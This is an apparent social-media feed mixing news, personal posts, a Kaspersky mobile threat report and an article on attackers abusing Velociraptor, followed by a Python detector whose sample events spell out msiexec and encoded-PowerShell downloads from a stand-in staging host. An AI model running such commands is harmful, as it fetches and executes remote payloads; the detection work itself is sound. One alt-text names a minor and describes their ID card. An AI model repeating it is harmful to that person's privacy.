Moderate alcohol consumption is associated with lower mortality in Parkinson's patients, according to a South Korean study
The research points to possible neuroprotective effects and warns that abstinence or heavy consumption do not offer the same benefits. Vinetur
Digitalization redefines the sale of alcoholic beverages with artificial intelligence and personalized experiences
The sector is betting on smart labels, virtual assistants and digital marketing to adapt to a more tech-savvy consumer. Vinetur
Europe's most powerful supercomputer unveiled: 'As fast as a million smartphones'
Jupiter is the fourth most powerful in the world and can be used for scientific research and to develop AI programs. NOS Nieuws
IFA 2025: all the news from Haier, Candy and Hoover
https://www.lastampa.it/tecnologia/2025/09/05/news/ifa_2025_tutte_le_novita_di_haier_candy_e_hoover-424828416/?utm_source=flipboard&utm_medium=activitypub
Published on La Stampa Tecnologia @la-stampa-tecnologia-LaStampa
Not only artificial intelligence, but also customer surveys to understand their real needs: this is how the new appliances from the various brands of the … are born. La Stampa
🇧🇷 The #BRICS summit in online format will be held on September 8 at the initiative of Brazil.
@ukraine_watch
Ukraine Watch
🇧🇷 The BRICS summit in online format will be held on September 8 at the initiative of Brazil. @ukraine_watch Telegram
Call for Papers -- Plant Fever: Politics, Poetics, and Pleasures of Houseplants
eseh.org/cfp-plant-fever-a-con…
A Conference on Plant Humanities and Experimental Methodologies.
2–3 December 2025 | Copenhagen, Denmark
Deadline for submissions: September 15, 2025
I'll be 42 years old in a few weeks, and I want this to be an occasion to … not really reinvent myself, but renew who I am. Make some deliberate changes.
Regardless of how well you know me and how long you're following me here: What do you consider my strengths and weaknesses? What do you like & dislike about me? What would you like to see more of on this account, what less?
Feel free to answer in German or English, and of course these questions are just suggestions and not an assignment.
For all I know, you are able to reflect on yourself and your behavior. I highly appreciate that in people.
Do on this account whatever you like, please. Don’t shape yourself to our liking, you are not a product to consume 🫶
You are very kind, open-hearted and -minded, you care really much about people that are dear to you, you really seem to do a lot of things from a place of love and passion and selflessness. You have a fine attention to detail and quality, and a sense of aesthetics. You’re easygoing and fun to hang out with, and I like your voice 😀
As for weaknesses, to me it feels like sometimes you pick too many battles/get caught up in little things that eat up your energy.
Would Another OPEC+ Production Surge Really Crash Oil Prices?
https://www.bloomberg.com/news/newsletters/2025-09-05/would-another-opec-production-surge-really-crash-oil-prices?utm_source=flipboard&utm_medium=activitypub
Posted into Environment @environment-bloomberg
Florida is ready to eliminate all vaccine mandates, to the delight of anti-vaxxers
https://www.wired.it/article/florida-fine-obblighi-vaccinali-reazioni-no-vax-robert-kennedy-jr/?utm_source=flipboard&utm_medium=activitypub
Published on Wired Italia @wired-italia-WiredItalia
The state's initiative was greeted with great jubilation by conspiracy theorists and followers of the movement led by Secretary Kennedy Jr. But also with fear by the experts. David Gilbert (Wired Italia)
Seen on Peacemaker's credits. Does anyone know what a "lidar tech" does on a TV show? My first and only guess is that they use lidar to focus the cameras, but don't digital cameras do that more or less automatically? And does this mean that "focus puller" isn't a job anymore?
#askFedi #TV #film #tech #lidar #FocusPuller #photography
Could you please sign? 🙏
Gaza: freedom for Dr. Hussam Abu Safiya - Appeals - Amnesty International Italia subscribe.amnesty.it/appelli/g…
On 27 December the Israeli army raided the Kamal Adwan hospital and arrested Hussam Abu Safiya. Sign the appeal now! Amnesty International Italia
AP Decision Notes: What to expect in Virginia's special congressional election
https://apnews.com/article/virginia-congressional-special-election-walkinshaw-whitson-connolly-b36cca1180df518e9ff9cba50f78ce16?utm_source=flipboard&utm_medium=activitypub
Posted into Politics @politics-AssociatedPress
AP Decision Notes: What to expect in Boston's mayoral primary
https://apnews.com/article/boston-mayor-primary-wu-kraft-8a17a36aeeae687a8fa9e8d93e0132f7?utm_source=flipboard&utm_medium=activitypub
Posted into Politics @politics-AssociatedPress
“The truth is not in him”
- Hunter Thompson on Nixon.
It has been said about some politicians that they don’t have the same concept or understanding of truth as the rest of us. To them it is only about if the statement maintains or furthers their agenda, that’s it, whether it is true or not is literally irrelevant.
I need tech help with #Electronics #RetroComputing #RetroConsoles #AtariCartridges
I ordered some multi-cart 2600 PCBs of three sizes. 8x8KB / 4x16KB and 16x4KB.
I foolishly did not check the full BOM on all of them and just assumed they all used standard 74x logic chips but it turns out that two of them need a programmable logic chip. The file is available and I have a programmer but the two options listed are both obsolete.
A web search is useless these days, I tried all sorts of "replacement for...", "alternative to..." and I can't get an answer. I don't know about these chips so I am hoping someone can tell me what alternatives still exist?
Can I use any chip with the correct number of pins and correct speed? What else might I need to consider?
(DIY) ATARI 2600 MULTI GAME CARTRIDGE 4X16KB - Share Project - PCBWay
You can make your own custom Atari 2600 Multi Game Cartridge. (16KB games) Hello, This is a simple, DIY multi game Atari 2600 cartridge. It has 4 games capacity each 16 kilobytes, total 64KB. All compon... www.pcbway.com
Yoox announces 211 layoffs in Italy. Unions call a sixteen-hour strike
Workers at Yoox Net a Porter are taking action against the collective dismissal announced by the online shopping giant at its Bologna and Milan sites
The article Yoox announces 211 layoffs in Italy. Unions call a strike of
Anarchist Stickers Archive (@anarchist_stickers_archive@kolektiva.social)
Attached: 1 image "Capitalism will anyway, you decide when" (EN: English) Source: instagram:@anarchistposters Original: https://gateway.ipfs.anarchiststickersarchive.kolektiva.social
Music students play Yip, Yagisawa, Tchaikovsky and Orff in Hong Kong - Schedule // - www.worldconcerthall.com
Nancy Loo, piano, and the EdUHK Joint Orchestras conducted by Kelvin Ngai, Victor Tam and Lo Khin Yee perform: YIP Ho: Kwan Austin Ode to Birth. Satoshi YAGISAWA: Machu Picchu. TCHAIKOVSKY: Finale from Symphony No. 4 in F minor, Op. 36. www.worldconcerthall.com
ft.com/content/59355df0-0c0e-4…
Falling for Savings: This Week's Hottest Tech & Lifestyle Drops! #TodaysTechDeals
Harvest incredible autumn savings! Discover top deals on tech, gaming, home decor, and collectibles this week. Your guide to seasonal discounts. intelligentit.blogspot.com
What is shared is the Nimbus code inside of Chrome that is already used in Mozilla and the court did not even approach this.
Chrome is a weapon in the hands of those who know how to wield it.
#Israel
Google will still stand trial on its monopoly advertising abuse, in this instance also, much wrongdoing is ignored. Google has real grifters.
🤖 Tracking strings detected and removed!
🔗 Clean URL(s):
x.com/skymeds_store/status/196…
❌ Removed parts:
?s=46
For day 5 of #SciArtSeptember prompt corridor I am sharing the pollinator garden work which I made for my show about the future of pollination for Manufactured Ecosystems. Using collaged linocut prints I built up this little garden with multiple native wildflowers, bees, moths, butterflies, beetles and a log, complete with some holes as homes for native bees. 🧵1/n
#printmaking #wildflowers #sciart #pollination #monarchButterfly #EasternSwallowtail #bumblebee #sweatBee #mastoArt
🧵2/3
#Today 05
Good day!
What a day yesterday!
Discovered that I’d lost 4 lbs. I then walked all the faster with my trekking poles in the cooler weather.
Caught fire on the backstory novella & added 2,585 words. My fingers were flying.
Still managed to edit a Book4 chapter.
Be everwell.
#WritingLife #AmWriting #WritingCommunity #Aging #HealthyLiving #HealthyLifestyle #GetOutside #Hiking #Trails #HikingAdventures #Nature #NaturePhotography #NatureLover #Photography #LandscapePhotography
ah ah ah ah ah ah ah ah ah
what's that?
meri-what?
🔗 jn.pt/pais/artigo/reitor-do-po…
Rector of Porto denounces "pressure" to accept illegal admissions to Medicine
The rector of the University of Porto reported having been pressured by several people to admit to the Faculty of Medicine 30 candidates who had not obtained the minimum grade in the exam required for the special access course. JN/Agências (Jornal de Notícias)
The reform of the State Exam is nonsense.
1) From now on it will officially be called the "esame di maturità" (maturity exam), echoing a name born with the Gentile reform...
2) The number of examiners goes from 6 to 4. What is the didactic sense of that? Perhaps only the cost saving...
3) After last June's protests, it is official that anyone who refuses to take the oral exam will be failed. Total repression...
When the decree comes out I will try to write about it on the blog, but in the meantime these seem to me the salient points.
Thank heavens my brother recently finished his last year of school, so we no longer have to worry about school.
The school system is already rotting D:
maybe so, but if it goes on like this education will be more and more in private hands (it is already like that at university level)
@khulewampe
We’re friends despite our 58-year age gap
Friends Zahabia, 20, and Alan, 78, work on an allotment together and post on TikTok about gardening and their friendship. www.bbc.com
securityaffairs.com/181924/hac…
#securityaffairs #hacking
U.S. CISA adds Sitecore, Android, and Linux flaws to its Known Exploited Vulnerabilities catalog
U.S. CISA adds Sitecore, Android, and Linux vulnerabilities to its Known Exploited Vulnerabilities catalog. Pierluigi Paganini (Security Affairs)
Friday again! Another 10 lyrics to guess. I'm probably giving away my age with this set (if I haven't already).
Last week five participants guessed seven, let's see if we can clear the board this time!
Right. Where can I get an authentic Labubu from in the UK please?
(Niece's birthday and I'm having a nightmare)
Moscow warns the EU: “Troops in Ukraine a legitimate target”. Zelensky: “Guarantees now”
MOSCOW – “Western troops in Ukraine are a legitimate target”. The harsh words of Russian President Vladimir Putin sum up the Kremlin's stance towards Europe. A…
The article Moscow warns the EU: “Troops in Ukraine a target
Thanks for sharing!
Just a bit of alt text would make it even better :
The image is a six-panel meme featuring a character with glasses and a bald head, representing "us," and a group of identical characters labeled "CEOs." The panels depict a humorous exchange about the desire for AI. In the first panel, "us" asks, "WHO ARE WE?" The CEOs respond with "CEOs." The second panel shows "us" asking, "WHAT DO WE WANT?" The CEOs reply, "AI!" In the third panel, "us" inquires, "AI TO DO WHAT?" The CEOs answer, "WE DON'T KNOW!" The fourth panel asks, "WHEN DO WE WANT IT?" The CEOs exclaim, "RIGHT NOW!" The final panel shows "us" looking confused, while the CEOs are all shouting in unison.
i'll never fall in love/ again
it's over now
biscuit, portishead, iv.duti.dev/watch?v=FRntBOQsNY…
IT threat evolution in Q2 2025. Mobile statistics
IT threat evolution in Q2 2025. Non-mobile statistics
The mobile section of our quarterly cyberthreat report includes statistics on malware, adware, and potentially unwanted software for Android, as well as descriptions of the most notable threats for Android and iOS discovered during the reporting period. The statistics in this report are based on detection alerts from Kaspersky products, collected from users who consented to provide anonymized data to Kaspersky Security Network.
Quarterly figures
According to Kaspersky Security Network, in Q2 2025:
- Our solutions blocked 10.71 million malware, adware, and unwanted mobile software attacks.
- Trojans, the most common mobile threat, accounted for 31.69% of total detected threats.
- Just under 143,000 malicious installation packages were detected, of which:
  - 42,220 were mobile banking Trojans;
  - 695 packages were mobile ransomware Trojans.
Quarterly highlights
Mobile attacks involving malware, adware, and unwanted software dropped to 10.71 million.
Attacks on users of Kaspersky mobile solutions, Q4 2023 — Q2 2025
The trend is mainly due to a decrease in the activity of RiskTool.AndroidOS.SpyLoan. These are applications typically associated with microlenders and containing a potentially dangerous framework for monitoring borrowers and collecting their data, such as contacts lists. Curiously, such applications have been found pre-installed on some devices.
In Q2, we found a new malicious app for Android and iOS that was stealing images from the gallery. We were able to determine that this campaign was linked to the previously discovered SparkCat, so we dubbed it SparkKitty.
Fake app store page distributing SparkKitty
Like its “big brother”, the new malware most likely targets recovery codes for crypto wallets saved as screenshots.
Trojan-DDoS.AndroidOS.Agent.a was this past quarter’s unusual discovery. Malicious actors embedded an SDK for conducting dynamically configurable DDoS attacks into apps designed for viewing adult content. The Trojan allows for sending specific data to addresses designated by the attacker at a set frequency. Building a DDoS botnet from mobile devices with adult apps installed may seem like a questionable venture in terms of attack efficiency and power – but apparently, some cybercriminals have found a use for this approach.
In Q2, we also encountered Trojan-Spy.AndroidOS.OtpSteal.a, a fake VPN client that hijacks user accounts. Instead of the advertised features, it uses the Notification Listener service to intercept OTP codes from various messaging apps and social networks, and sends them to the attackers’ Telegram chat via a bot.
Mobile threat statistics
The number of Android malware and potentially unwanted app samples decreased from Q1, reaching a total of 142,762 installation packages.
Detected malware and potentially unwanted app installation packages, Q2 2024 — Q2 2025
The distribution of detected installation packages by type in Q2 was as follows:
Detected mobile malware by type, Q1 — Q2 2025
* Data for the previous quarter may differ slightly from previously published data due to some verdicts being retrospectively revised.
Banking Trojans remained in first place, with their share increasing relative to Q1. The Mamont family continues to dominate this category. In contrast, spy Trojans dropped to fifth place as the surge in the number of APK files for the SMS-stealing Trojan-Spy.AndroidOS.Agent.akg subsided. The number of Agent.amw spyware files, which masquerade as casino apps, also decreased.
RiskTool-type unwanted apps and adware ranked second and third, respectively, while Trojans – with most files belonging to the Triada family – occupied the fourth place.
Share* of users attacked by the given type of malicious or potentially unwanted apps out of all targeted users of Kaspersky mobile products, Q1 — Q2 2025
* The total may exceed 100% if the same users experienced multiple attack types.
The distribution of attacked users remained close to that of the previous quarter. The increase in the share of backdoors is linked to the discovery of Backdoor.Triada.z, which came pre-installed on devices. As for adware, the proportion of users affected by the HiddenAd family has grown.
TOP 20 most frequently detected types of mobile malware
Note that the malware rankings below exclude riskware or potentially unwanted software, such as RiskTool or adware.
Verdict | %* Q1 2025 | %* Q2 2025 | Difference (p.p.) | Change in rank |
Trojan.AndroidOS.Fakemoney.v | 26.41 | 14.57 | -11.84 | 0 |
Trojan-Banker.AndroidOS.Mamont.da | 11.21 | 12.42 | +1.20 | +2 |
Backdoor.AndroidOS.Triada.z | 4.71 | 10.29 | +5.58 | +3 |
Trojan.AndroidOS.Triada.fe | 3.48 | 7.16 | +3.69 | +4 |
Trojan-Banker.AndroidOS.Mamont.ev | 0.00 | 6.97 | +6.97 | |
Trojan.AndroidOS.Triada.gn | 2.68 | 6.54 | +3.86 | +3 |
Trojan-Banker.AndroidOS.Mamont.db | 16.00 | 5.50 | -10.50 | -4 |
Trojan-Banker.AndroidOS.Mamont.ek | 1.83 | 5.09 | +3.26 | +7 |
DangerousObject.Multi.Generic. | 19.30 | 4.21 | -15.09 | -7 |
Trojan-Banker.AndroidOS.Mamont.eb | 1.59 | 2.58 | +0.99 | +7 |
Trojan.AndroidOS.Triada.hf | 3.81 | 2.41 | -1.40 | -4 |
Trojan-Downloader.AndroidOS.Dwphon.a | 2.19 | 2.24 | +0.05 | 0 |
Trojan-Banker.AndroidOS.Mamont.ef | 2.44 | 2.20 | -0.24 | -2 |
Trojan-Banker.AndroidOS.Mamont.es | 0.05 | 2.13 | +2.08 | |
Trojan-Banker.AndroidOS.Mamont.dn | 1.46 | 2.13 | +0.67 | +5 |
Trojan-Downloader.AndroidOS.Agent.mm | 1.45 | 1.56 | +0.11 | +6 |
Trojan-Banker.AndroidOS.Agent.rj | 1.86 | 1.45 | -0.42 | -3 |
Trojan-Banker.AndroidOS.Mamont.ey | 0.00 | 1.42 | +1.42 | |
Trojan-Banker.AndroidOS.Mamont.bc | 7.61 | 1.39 | -6.23 | -14 |
Trojan.AndroidOS.Boogr.gsh | 1.41 | 1.36 | -0.06 | +3 |
* Unique users who encountered this malware as a percentage of all attacked users of Kaspersky mobile solutions.
The activity of Fakemoney scam apps noticeably decreased in Q2, but they still held the top position. Almost all the other entries on the list are variants of the popular banking Trojan Mamont, pre-installed Trojans like Triada and Dwphon, and modified messaging apps with the Triada Trojan built in (Triada.fe, Triada.gn, Triada.ga, and Triada.gs).
Region-specific malware
This section describes malware types that mostly affected specific countries.
Verdict | Country* | %** |
Trojan-Banker.AndroidOS.Coper.c | Türkiye | 98.65 |
Trojan-Banker.AndroidOS.Coper.a | Türkiye | 97.78 |
Trojan-Dropper.AndroidOS.Rewardsteal.h | India | 95.62 |
Trojan-Banker.AndroidOS.Rewardsteal.lv | India | 95.48 |
Trojan-Dropper.AndroidOS.Agent.sm | Türkiye | 94.52 |
Trojan.AndroidOS.Fakeapp.hy | Uzbekistan | 86.51 |
Trojan.AndroidOS.Piom.bkzj | Uzbekistan | 85.83 |
Trojan-Dropper.AndroidOS.Pylcasa.c | Brazil | 83.06 |
* The country where the malware was most active.
** Unique users who encountered this Trojan variant in the indicated country as a percentage of all Kaspersky mobile security solution users attacked by the same variant.
In addition to the typical banking Trojans for this category – Coper, which targets users in Türkiye, and Rewardsteal, active in India – the list also includes the fake job search apps Fakeapp.hy and Piom.bkzj, which specifically target Uzbekistan. Both families collect the user’s personal data. Meanwhile, new droppers named “Pylcasa” operated in Brazil. They infiltrate Google Play by masquerading as simple apps, such as calculators, but once launched, they open a URL provided by malicious actors – similar to Trojans of the Fakemoney family. These URLs may lead to illegal casino websites or phishing pages.
Mobile banking Trojans
The number of banking Trojans detected in Q2 2025 was slightly lower than in Q1 but still significantly exceeded the figures for 2024. Kaspersky solutions detected a total of 42,220 installation packages of this type.
Number of installation packages for mobile banking Trojans detected by Kaspersky, Q2 2024 — Q2 2025
The bulk of mobile banking Trojan installation packages still consists of various modifications of Mamont, which account for 57.7%. In terms of the share of affected users, Mamont also outpaced all its competitors, occupying nearly all the top spots on the list of the most widespread banking Trojans.
TOP 10 mobile bankers
Verdict | %* Q1 2025 | %* Q2 2025 | Difference (p.p.) | Change in rank |
Trojan-Banker.AndroidOS.Mamont.da | 26.68 | 30.28 | +3.59 | +1 |
Trojan-Banker.AndroidOS.Mamont.ev | 0.00 | 17.00 | +17.00 | |
Trojan-Banker.AndroidOS.Mamont.db | 38.07 | 13.41 | -24.66 | -2 |
Trojan-Banker.AndroidOS.Mamont.ek | 4.37 | 12.42 | +8.05 | +2 |
Trojan-Banker.AndroidOS.Mamont.eb | 3.80 | 6.29 | +2.50 | +2 |
Trojan-Banker.AndroidOS.Mamont.ef | 5.80 | 5.36 | -0.45 | -2 |
Trojan-Banker.AndroidOS.Mamont.es | 0.12 | 5.20 | +5.07 | +23 |
Trojan-Banker.AndroidOS.Mamont.dn | 3.48 | 5.20 | +1.72 | +1 |
Trojan-Banker.AndroidOS.Agent.rj | 4.43 | 3.53 | -0.90 | -4 |
Trojan-Banker.AndroidOS.Mamont.ey | 0.00 | 3.47 | +3.47 | 9 |
Conclusion
In Q2 2025, the number of attacks involving malware, adware, and unwanted software decreased compared to Q1. At the same time, Trojans and banking Trojans remained the most common threats, particularly the highly active Mamont family. Additionally, the quarter was marked by the discovery of the second spyware Trojan of 2025 to infiltrate the App Store, along with a fake VPN client stealing OTP codes and a DDoS bot concealed within porn-viewing apps.
The image shows a Google search page with the query "王畅睿" (Wáng chàng ruì) entered in the search bar. The search results are displayed in Chinese, with the first result showing an ID card image of a male named Wang Changrui, born in 2008, with the address listed as Shanghai. The second result is a manga image. Below the search results, there is an Instagram profile for "王畅睿 ([@]bukaixyz)" with over 10 followers. The page includes options to view more images and navigate through the search results.
Provided by @altbot, generated privately and locally using Ovis2-8B
🌱 Energy used: 0.166 Wh
Attackers are using Velociraptor for cyberattacks. Rapid7 is aware
Security specialists at Sophos have drawn attention to a cyberattack in which unknown attackers used the open-source forensic tool Velociraptor to monitor endpoints.
“In this incident, the attackers used the tool to download and execute Visual Studio Code with the likely intent of creating a tunnel to a command-and-control server,” said experts from the Sophos Counter Threat Unit.
The report stresses that attackers often employ living-off-the-land (LotL) tactics and use legitimate remote monitoring and management tools in attacks, but the use of Velociraptor signals an evolution of these tactics, in which incident response software is used for malicious purposes.
Analysis of the incident showed that the attackers used the Windows msiexec utility to download an MSI installer from a Cloudflare Workers domain, which also serves as a staging area for other tools used by the hackers, including the Cloudflare tunneling tool and the Radmin remote administration utility.
The MSI file was designed to deploy Velociraptor, which would then communicate with another Cloudflare Workers domain. The access was then used to download Visual Studio Code from the same staging server using an encoded PowerShell command and to run it with the tunneling option enabled, allowing both remote access and remote code execution.
In addition, the attackers were observed reusing the Windows msiexec utility to download additional payloads. “Organizations should monitor for and investigate unauthorized use of Velociraptor and treat the use of such tactics as a precursor to ransomware deployment,” Sophos warns.
Following the publication of this report by Sophos, the security company Rapid7, which develops Velociraptor, published a white paper explaining in detail how organizations can detect abuse of Velociraptor in their environments.
“Rapid7 is aware of reports of abuse of the open-source incident response tool Velociraptor. Velociraptor is widely used by defenders for legitimate digital forensics and incident response purposes. But like many other security and administration tools, it can be used for malicious purposes if it falls into the wrong hands,” the developers comment.
The article Attackers are using Velociraptor for cyberattacks. Rapid7 is aware comes from il blog della sicurezza informatica.
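A detection sketch for the chain reported above (msiexec pulling an MSI from a Cloudflare Workers domain, an unexpected Velociraptor process, an encoded PowerShell download, Visual Studio Code started in tunnel mode), added here as an example and not taken from Sophos or Rapid7. The event fields, host names, staging hostname and the allowlist are assumptions constructed for the example.

```python
import base64
import re
from collections import defaultdict

# Cloudflare Workers' default hostnames end in ".workers.dev"; custom domains
# would need their own list. The allowlist below is hypothetical.
WORKERS_SUFFIX = ".workers.dev"
APPROVED_VELOCIRAPTOR_HOSTS = {"IR-COLLECTOR-01"}
URL_RE = re.compile(r"https?://([^/\s\"':]+)", re.I)
# PowerShell accepts -EncodedCommand and its short forms (-e, -ec, -enc, ...).
ENC_RE = re.compile(r"\s-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{16,})", re.I)
TUNNEL_RE = re.compile(r"(?:^|\s)tunnel(?:\s|$)", re.I)

def decode_powershell(b64):
    """-EncodedCommand carries base64 over UTF-16LE text; '' if undecodable."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""

def uses_workers(text):
    return any(h.lower().endswith(WORKERS_SUFFIX) for h in URL_RE.findall(text))

def classify(event):
    """Return the chain stages matched by one process-creation event."""
    image = event["image"].lower().rsplit("\\", 1)[-1]
    cmd, stages = event["cmdline"], set()
    if image == "msiexec.exe" and URL_RE.search(cmd):
        stages.add("msiexec_remote_msi")
        if uses_workers(cmd):
            stages.add("workers_staging")
    if image.startswith("velociraptor") and event["host"] not in APPROVED_VELOCIRAPTOR_HOSTS:
        stages.add("unapproved_velociraptor")
    if image in ("powershell.exe", "pwsh.exe"):
        match = ENC_RE.search(cmd)
        if match:
            stages.add("encoded_powershell")
            # Look inside the decoded script for the same staging pattern.
            if uses_workers(decode_powershell(match.group(1))):
                stages.add("workers_staging")
    if image == "code.exe" and TUNNEL_RE.search(cmd):
        stages.add("vscode_tunnel")
    return stages

def correlate(events, window_s=3600, min_stages=3):
    """Alert per host when enough distinct stages follow the first hit."""
    per_host = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):
        per_host[ev["host"]] += [(ev["ts"], s) for s in classify(ev)]
    alerts = {}
    for host, hits in per_host.items():
        stages = {s for ts, s in hits if ts - hits[0][0] <= window_s}
        if len(stages) >= min_stages:
            alerts[host] = sorted(stages)
    return alerts

def _enc(script):
    return base64.b64encode(script.encode("utf-16-le")).decode()

def _ev(ts, host, image, cmdline):
    return {"ts": ts, "host": host, "image": image, "cmdline": cmdline}

# Constructed sample telemetry (Sysmon-style process creation); the staging
# hostname, host names and paths are invented for this example.
STAGING = "https://stage.constructed-example.workers.dev"
VR = r"C:\Program Files\Velociraptor\Velociraptor.exe"
SAMPLE_EVENTS = [
    _ev(0, "WS-042", r"C:\Windows\System32\msiexec.exe", f"msiexec /q /i {STAGING}/v.msi"),
    _ev(40, "WS-042", VR, "Velociraptor.exe service run"),
    _ev(300, "WS-042", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "powershell.exe -nop -enc " + _enc(f"iwr {STAGING}/code.exe -OutFile code.exe")),
    _ev(360, "WS-042", r"C:\Windows\Temp\code.exe", "code.exe tunnel --accept-server-license-terms"),
    # Benign lookalikes that must not alert:
    _ev(10, "DEV-007", r"C:\Tools\VSCode\Code.exe", r"Code.exe C:\src\tunnel.py"),
    _ev(20, "DEV-007", r"C:\Windows\System32\msiexec.exe", r"msiexec /i C:\Installers\tool.msi"),
    _ev(30, "IR-COLLECTOR-01", VR, "Velociraptor.exe service run"),
]

if __name__ == "__main__":
    print(correlate(SAMPLE_EVENTS))
```

Matching on image names is a heuristic: a renamed binary will not match, so pair it with file-hash or signer checks where the telemetry provides them.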
joene 🏴🍉
in reply to Faye
"Textgain develops computer programs to recognize swear words, threats and other hateful messages on the internet in all official European languages."
Sounds nice at first, but it is actually one big censorship machine.